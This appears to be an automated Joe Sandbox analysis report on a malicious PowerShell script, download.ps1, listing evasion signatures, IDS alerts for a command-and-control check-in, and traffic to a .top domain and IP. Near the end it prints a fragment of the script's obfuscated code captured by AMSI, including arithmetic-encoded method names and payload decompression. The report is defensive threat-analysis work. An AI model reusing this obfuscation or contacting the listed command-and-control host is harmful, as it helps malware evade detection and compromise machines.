Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1586073
MD5:c3069b0a32c08b0a370416307a30763b
SHA1:4323b4456b90bb1607100358745ab749f8a39f71
SHA256:ef449349ec7314b24d3144ebb71c04514eef6d6afb7932c6d5cf403ce22ea147
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • powershell.exe (PID: 8388 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 8420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • svchost.exe (PID: 1448 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: F586835082F632DC8D9404D83BC16316)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5020, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 8388, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5020, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 8388, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 904, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1448, ProcessName: svchost.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-08T17:34:55.057385+010020577411A Network Trojan was detected192.168.11.204970645.61.136.13880TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-08T17:34:55.057385+010018100002Potentially Bad Traffic192.168.11.204970645.61.136.13880TCP
2025-01-08T17:34:55.568587+010018100002Potentially Bad Traffic192.168.11.2049707172.217.1.10080TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: Binary string: n.pdb> source: powershell.exe, 00000000.00000002.1010148983.0000019C431AF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbs.dll source: powershell.exe, 00000000.00000002.1009760762.0000019C4316A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.977310637.0000019C28989000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.977310637.0000019C28989000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1007540490.0000019C42D3B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978107895.0000019C2A638000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1009184849.0000019C42E99000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb~ source: powershell.exe, 00000000.00000002.1010148983.0000019C431AF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000000.00000002.1007540490.0000019C42D3B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.977310637.0000019C28989000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978107895.0000019C2A638000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1007540490.0000019C42DFC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbdll source: powershell.exe, 00000000.00000002.1009760762.0000019C4316A000.00000004.00000020.00020000.00000000.sdmp

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.11.20:49706 -> 45.61.136.138:80
Queries Google from non browser process on port 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: Joe Sandbox ViewASN Name: AS40676US AS40676US
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.20:49707 -> 172.217.1.100:80
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.20:49706 -> 45.61.136.138:80
Source: global trafficHTTP traffic detected: GET /qp49hfdl12htr.php?id=computer&key=36785799113&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: canjjclmlnicbga.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /qp49hfdl12htr.php?id=computer&key=36785799113&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: canjjclmlnicbga.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: powershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><span equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: canjjclmlnicbga.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.978672288.0000019C2ADA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$kslt27cb1amnzqo/$wtdlhyxu19ai8vf.php?id=$env:computername&key=$rpsakvbwizxdmj&s=527
Source: powershell.exe, 00000000.00000002.978672288.0000019C2B7A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://canjjclmlnicbga.top
Source: powershell.exe, 00000000.00000002.978672288.0000019C2B7A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://canjjclmlnicbga.top/qp49hfdl12htr.php?id=computer&key=36785799113&s=527
Source: powershell.exe, 00000000.00000002.978107895.0000019C2A682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2188514912.000002805AF02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000000.00000002.978107895.0000019C2A638000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2188514912.000002805AF02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000000.00000002.1009617159.0000019C42EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micr9
Source: powershell.exe, 00000000.00000002.1009760762.0000019C4316A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
Source: powershell.exe, 00000000.00000002.1007540490.0000019C42D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.p
Source: powershell.exe, 00000000.00000002.1007540490.0000019C42DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.t.com/pki/crl/pr
Source: svchost.exe, 00000006.00000002.2188514912.000002805AF02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: edb.log.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/update2/actxsdodvxbjblyjfcbcbc7srcwa_1.3.36.242/GoogleUpda
Source: powershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.1002083018.0000019C3AC49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.978672288.0000019C2ADA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.978672288.0000019C2ADA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXzf
Source: qmgr.db.6.drString found in binary or memory: http://r4---sn-5hnekn7k.gvt1.com/edgedl/release2/chrome/acb3kitere6jimdp6rrtasanb2aq_93.0.4577.82/93
Source: qmgr.db.6.drString found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome/acb3kitere6jimdp6rrtasanb2aq_93.0.4577.82/93.0.457
Source: qmgr.db.6.drString found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/aciwgjnovhktokhzyboslawih45a_2700/jflook
Source: qmgr.db.6.drString found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/acze3h5f67uhtnjsyv6pabzn277q_298/lmelgle
Source: qmgr.db.6.drString found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/dp66roauucji6olf7ycwe24lea_6869/hfnkpiml
Source: powershell.exe, 00000000.00000002.1002083018.0000019C3AED2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2C308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2C61A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2C627000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2C631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1002083018.0000019C3ADF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2C2FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2C316000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2BA6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2C63E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2C635000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2C311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2C4F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1002083018.0000019C3ABD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2BA55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2C31A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2C623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2C2FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2C2F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1002083018.0000019C3ADB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.978672288.0000019C2BA6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPageXzf
Source: powershell.exe, 00000000.00000002.978672288.0000019C2ADA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.978672288.0000019C2ABD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.978672288.0000019C2ADA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: qmgr.db.6.drString found in binary or memory: http://storage.googleapis.com/update-delta/ggkkehgbnfjpeggfpleeakpidbkibbmn/2021.9.13.1142/2021.9.7.
Source: qmgr.db.6.drString found in binary or memory: http://storage.googleapis.com/update-delta/jamhcnnkihinmdlkakkaopbjbbcngflc/96.0.4648.2/96.0.4642.0/
Source: qmgr.db.6.drString found in binary or memory: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/45/43/19f2dc8e4c5c5d0383
Source: powershell.exe, 00000000.00000002.1007540490.0000019C42DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wsoft.com/pki/ceroCerAut_2010-06-
Source: powershell.exe, 00000000.00000002.978672288.0000019C2ADA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.978672288.0000019C2ADA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzf
Source: powershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.978672288.0000019C2BA6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2BA43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=en
Source: powershell.exe, 00000000.00000002.978672288.0000019C2BA43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.comj
Source: powershell.exe, 00000000.00000002.1009760762.0000019C4317E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000000.00000002.978107895.0000019C2A682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2188514912.000002805AF02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2188353414.000002805AE99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.978672288.0000019C2ABD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1002083018.0000019C3AED2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1002083018.0000019C3ADF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2BA6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1002083018.0000019C3ABD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2BA55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1002083018.0000019C3ADB3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1002083018.0000019C3AE64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.978672288.0000019C2BA6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.comXzf
Source: powershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.1002083018.0000019C3AC49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1002083018.0000019C3AC49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1002083018.0000019C3AC49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1002083018.0000019C3ADF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2BA43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1002083018.0000019C3AE64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
Source: edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: powershell.exe, 00000000.00000002.978672288.0000019C2ADA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.978672288.0000019C2ADA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXzf
Source: powershell.exe, 00000000.00000002.1002083018.0000019C3AE64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.978672288.0000019C2BA6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24h
Source: powershell.exe, 00000000.00000002.1002083018.0000019C3AED2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1002083018.0000019C3ADF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2BA6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1002083018.0000019C3ABD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2BA55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1002083018.0000019C3ADB3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1002083018.0000019C3AE64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: qmgr.db.6.drString found in binary or memory: https://msftspeechmodelsprod.azureedge.net/SR/SV10-EV100/en-us-n/MV101/naspmodelsmetadata.xmlPC:
Source: powershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.1002083018.0000019C3AC49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.978107895.0000019C2A682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2188514912.000002805AF02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2188353414.000002805AE99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.978672288.0000019C2BA6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=wh
Source: powershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.978672288.0000019C2BA6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1002083018.0000019C3ABD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2BA55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1002083018.0000019C3ADB3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1002083018.0000019C3AE64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8758F7E860_2_00007FF8758F7E86
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8758F8C320_2_00007FF8758F8C32
Source: classification engineClassification label: mal64.evad.winPS1@3/11@2/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8420:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8420:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jswumb2v.yd5.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $zcil5pwu4yf2gbx.(([char[]]@((-3118+3185),(9796-9685),(-1839+(101+1850)),(7896-7775),(-1435+1519),(1312-1201)) -join ''))( $9dstvqwag8b752e ) $zcil5pwu4yf2gbx.((-join (@((432887/6461),(772848/7156),(-8484+8595),(9559-9444),(269064/2664))| ForEach-Object { [char]$_ })))()$pga9fvt4dslnq63.(([system.String]::new(@((649900/(17120-7420)),(751356/(14690-7733)),(4588-(11615-(15632220/(-2485+(817+3858))))),(1039140/(64724868/(10830-(2456+1211)))),(7796-7695)))))()[byte[]] $1lqx8rfd0as3kju = $9dstvqwag8b752e.(([system.String]::new(@((-2360+2444),(8149-(6029+(19461183/(14952-(15331-(82521068/8198)))))),(6186-6121),(-592+706),(149910/1315),(1334-(-7954+(9605-(4161-(22463265/5995))))),(4378-4257)))))() $c31nsrq4wkxf08d=$1lqx8rfd0as3kju return $c31nsrq4wkxf08d}[System.Text.Encoding]::ascii.(([system.String]::new(@((718-(31056/48)),(-9302+(12795-3392)),(-2568+2684),(281204/3388),(-8595+(-1305+10016)),(-7800+(3962+(6449664/1632))),(8087-(17291-(5280+(3059+(9926010/(76491675/(62192000/8320))))))),(390-(-4524+4804)),(1016816/(92944880/(9940-525)))))))((4hz1f9qwtmjaey6svlbkpux3c7i 